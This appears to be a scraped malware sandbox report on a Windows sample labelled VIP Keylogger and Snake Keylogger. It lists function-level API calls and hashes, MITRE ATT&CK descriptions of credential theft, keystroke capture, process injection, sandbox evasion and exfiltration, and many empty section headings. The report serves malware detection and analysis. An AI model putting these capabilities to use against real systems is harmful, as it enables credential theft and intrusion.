Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 0e3b2e08c8a6cdd6901ae2d5424d996994525fc66d2d3942c36b0de3bb5a1b08
Instruction ID: 0261cc3a8e7663d405643bcca7f5e6500a2b1c511ef9e2ab0df19f51bc10c9df
Opcode Fuzzy Hash: 0e3b2e08c8a6cdd6901ae2d5424d996994525fc66d2d3942c36b0de3bb5a1b08
Instruction Fuzzy Hash: F901B571A05219AB8F18EBA4CD558FE776AFF45320F140619F875572E2EE315808D690

Function 00638CFD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 005E7DE1: _memmove.LIBCMT ref: 005E7E22

Part of subcall function 0063AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0063AABC

SendMessageW.USER32(?,00000180,00000000,?), ref: 00638D6B

Strings

ComboBox, xrefs: 00638D0A
ListBox, xrefs: 00638D35

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 057f4dcb76fa646c297db2ce976ee5e872090785ae77bf01a7e4abe174b36600
Instruction ID: 56d78a333dcc2111036e9a15cd1b55789c4bd5b3d94fe0353e455534fd7b1e01
Opcode Fuzzy Hash: 057f4dcb76fa646c297db2ce976ee5e872090785ae77bf01a7e4abe174b36600
Instruction Fuzzy Hash: D901D471A4520DABCF19EBE1CE56AFE77AADF15300F100029B845632E2DE215E08D2B1

Function 00638D82 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 005E7DE1: _memmove.LIBCMT ref: 005E7E22

Part of subcall function 0063AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0063AABC

SendMessageW.USER32(?,00000182,?,00000000), ref: 00638DEE

Strings

ComboBox, xrefs: 00638D8F
ListBox, xrefs: 00638DBA

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: fcd896bdbb5beae2ccc9733f350d6ba2fccbd5ed8d06bb85a419201b1fff4545
Instruction ID: 9bd41adc19c98ed4e00f1231731c2c931390219fb98d39fcb9fed0f26306d4bc
Opcode Fuzzy Hash: fcd896bdbb5beae2ccc9733f350d6ba2fccbd5ed8d06bb85a419201b1fff4545
Instruction Fuzzy Hash: 4801A771A45209BBDF15EBA5CA46AFE77AEDF15300F100019B845A3292DE215E09E2B5

Function 0063C4EB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0063C534

Part of subcall function 0063C816: _memmove.LIBCMT ref: 0063C860
Part of subcall function 0063C816: VariantInit.OLEAUT32(00000000), ref: 0063C882
Part of subcall function 0063C816: VariantCopy.OLEAUT32(00000000,?), ref: 0063C88C

VariantClear.OLEAUT32(?), ref: 0063C556

Strings

d}i, xrefs: 0063C517

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: Variant$Init$ClearCopy_memmove
String ID: d}i
API String ID: 2932060187-509633705
Opcode ID: d8be6a4e18130ca9755e176b078e205b41633fe426c0fa373645a5af658296f7
Instruction ID: cc7b399e9845293b21f8bb97b4865974cd096761e9b46c8ae9d638c38c9de758
Opcode Fuzzy Hash: d8be6a4e18130ca9755e176b078e205b41633fe426c0fa373645a5af658296f7
Instruction Fuzzy Hash: 1C11D2B19007099FC710DF9AD88489AFBF8FF18314B50856EE58AD7612D771AA49CF90

Function 00644F28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00644F46
_wcscmp.LIBCMT ref: 00644F58

Strings

#32770, xrefs: 00644F52

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: 76c930460c96f0bde383a082a2491ab574f75e65f340f3b8abaad2ccf59b79f7
Instruction ID: 180ffdbab9c881a73ff60f5cee1fe19b8852090957703c14ad62abef263346b5
Opcode Fuzzy Hash: 76c930460c96f0bde383a082a2491ab574f75e65f340f3b8abaad2ccf59b79f7
Instruction Fuzzy Hash: 8CE0D1325042382BD710AB55EC45FA7F7ADDB45B71F011057FD04D3151D9609A5587E0

Function 0061B2C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 0061B314: _memset.LIBCMT ref: 0061B321

Part of subcall function 00600940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0061B2F0,?,?,?,005E100A), ref: 00600945

IsDebuggerPresent.KERNEL32(?,?,?,005E100A), ref: 0061B2F4
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,005E100A), ref: 0061B303

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0061B2FE

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3158253471-631824599
Opcode ID: 3a1f20ab22bc6b2b0be27ccee853bf8aabcc6f7c4335104e48493b592dfd1d16
Instruction ID: 9bbf7af71188f9890f736c41f3f2961b1f95c9b611be858fad2b7b0236b0d4a0
Opcode Fuzzy Hash: 3a1f20ab22bc6b2b0be27ccee853bf8aabcc6f7c4335104e48493b592dfd1d16
Instruction Fuzzy Hash: 74E06D702007418BD760EF68E4087827AEAEF04304F08AA2CE4A6C7740E7B4E584CBA1

Function 00621935 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?), ref: 00621775

Part of subcall function 0065BFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,0062195E,?), ref: 0065BFFE
Part of subcall function 0065BFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0065C010

FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0062196D

Strings

WIN_XPe, xrefs: 00621788

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: Library$AddressDirectoryFreeLoadProcSystem
String ID: WIN_XPe
API String ID: 582185067-3257408948
Opcode ID: e8e7a5c5bc5032441486aadb619177b13ed556b1eb96bab1cc0172e9046f8423
Instruction ID: cbd1e72395eb1e7d0e92afb95a76725a53046ad1a17f64c89443ee03fdd8a17b
Opcode Fuzzy Hash: e8e7a5c5bc5032441486aadb619177b13ed556b1eb96bab1cc0172e9046f8423
Instruction Fuzzy Hash: 1BF06D70808018DFCB25DFA5E984AECBBFAFB59301F141096E002BA190C7708F86DF60

Function 00665964 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0066596E
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00665981

Part of subcall function 00645244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 006452BC

Strings

Shell_TrayWnd, xrefs: 00665967

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 6444ef50ff5a74394437ab44e0309c1052b60227ffd0450e0a3178262d027c71
Instruction ID: 430ce7125a5252e3bb5724b55bd36dc433eb61ea4d2be6fae3e34849bd6e7f0b
Opcode Fuzzy Hash: 6444ef50ff5a74394437ab44e0309c1052b60227ffd0450e0a3178262d027c71
Instruction Fuzzy Hash: A7D0C931384711BBE7A4AB70EC0BF976A16AB11B50F01282AB24AAA1D1CDE09800C654

Function 00665998 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 006659AE
PostMessageW.USER32(00000000), ref: 006659B5

Part of subcall function 00645244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 006452BC

Strings

Shell_TrayWnd, xrefs: 006659A7

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 608928d0d39a313d8e585225963b46d49ebd338992132b54c5d5a45221171c2c
Instruction ID: 5f1384d6c89364bbe57fc944252b3bd71c585e54142ecdf1b78f8aa47d20685c
Opcode Fuzzy Hash: 608928d0d39a313d8e585225963b46d49ebd338992132b54c5d5a45221171c2c
Instruction Fuzzy Hash: 99D0C9313807117BE7A4AB70EC0BF976616AB16B50F01282AB246EA1D1CDE0A800C658

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report C5JLkBS1CX.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: VIP Keylogger

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\Milburt

C:\Users\user\AppData\Local\Temp\autBA82.tmp

C:\Users\user\AppData\Local\Temp\autC947.tmp

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Windows Analysis Report
C5JLkBS1CX.exe

Function 005E3B3A Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 153
windowCOMMON

Function 005E49A0 Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Function 005E4E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Function 00649155 Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Function 005E3015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 73
windowregistryCOMMON

Function 005E3041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Function 005E708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Function 005E3633 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151
windowtimeregistryCOMMON

Function 005E3A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Function 005E3766 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 267
COMMON

Function 005EF76F Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 168
comCOMMON

Function 0118A448 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Function 005E39D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Function 0118A228 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 142
fileCOMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

